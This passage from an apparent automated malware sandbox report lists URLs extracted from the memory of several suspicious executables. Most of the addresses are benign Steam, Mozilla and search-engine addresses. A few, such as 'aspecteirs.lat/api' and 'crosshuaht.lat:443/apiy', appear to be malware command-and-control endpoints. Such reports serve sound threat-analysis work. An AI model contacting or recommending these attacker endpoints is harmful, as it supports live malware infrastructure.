                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229492961.000000006F8ED000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2228408056.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2218666342.0000000005AEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1600401718.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2363864859.0000000003A75000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824473314.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2586973968.0000000003B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1600401718.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2363864859.0000000003A75000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824473314.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2586973968.0000000003B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1578377748.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578537783.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578446247.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000003.1941499890.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317638364.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317245338.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317060231.0000000003A9E000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794904156.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4795781202.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794653136.00000000034BE000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2482031701.0000000003B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                    Source: powershell.exe, 00000035.00000002.2538930366.0000017329871000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                    Source: powershell.exe, 0000001F.00000002.2276089201.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2315592782.0000000005151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBgq
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4792947545.000000000098B000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793361431.00000000009A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aspecteirs.lat/api
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1616651541.0000000005F65000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1616808855.0000000005F6F000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1616331109.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2221527701.000000000BB1E000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2367759874.0000000001547000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2612191991.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2612630439.00000000007FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1616651541.0000000005F65000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1616808855.0000000005F6F000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1616331109.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2221527701.000000000BB1E000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2367759874.0000000001547000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2612191991.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2612814549.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500000.1&cta
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1578377748.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578537783.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578446247.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000003.1941499890.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317638364.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317245338.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317060231.0000000003A9E000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794904156.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4795781202.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794653136.00000000034BE000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2482031701.0000000003B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1578377748.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578537783.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578446247.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000003.1941499890.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317638364.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317245338.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317060231.0000000003A9E000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794904156.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4795781202.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794653136.00000000034BE000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2482031701.0000000003B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1578377748.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578537783.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578446247.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000003.1941499890.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317638364.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317245338.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317060231.0000000003A9E000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794904156.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4795781202.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794653136.00000000034BE000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2482031701.0000000003B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793714186.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792797720.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1616651541.0000000005F65000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1616808855.0000000005F6F000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1616331109.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2221527701.000000000BB1E000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2367759874.0000000001547000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2612191991.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2612630439.00000000007FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1616651541.0000000005F65000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1616808855.0000000005F6F000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1616331109.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2221527701.000000000BB1E000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2367759874.0000000001547000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2612191991.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2612630439.00000000007FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                                    Source: powershell.exe, 00000035.00000002.2538930366.000001732B202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                    Source: powershell.exe, 00000035.00000002.2538930366.000001732B202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                    Source: powershell.exe, 00000035.00000002.2538930366.000001732B202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792947545.00000000009EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crosshuaht.lat:443/apiy
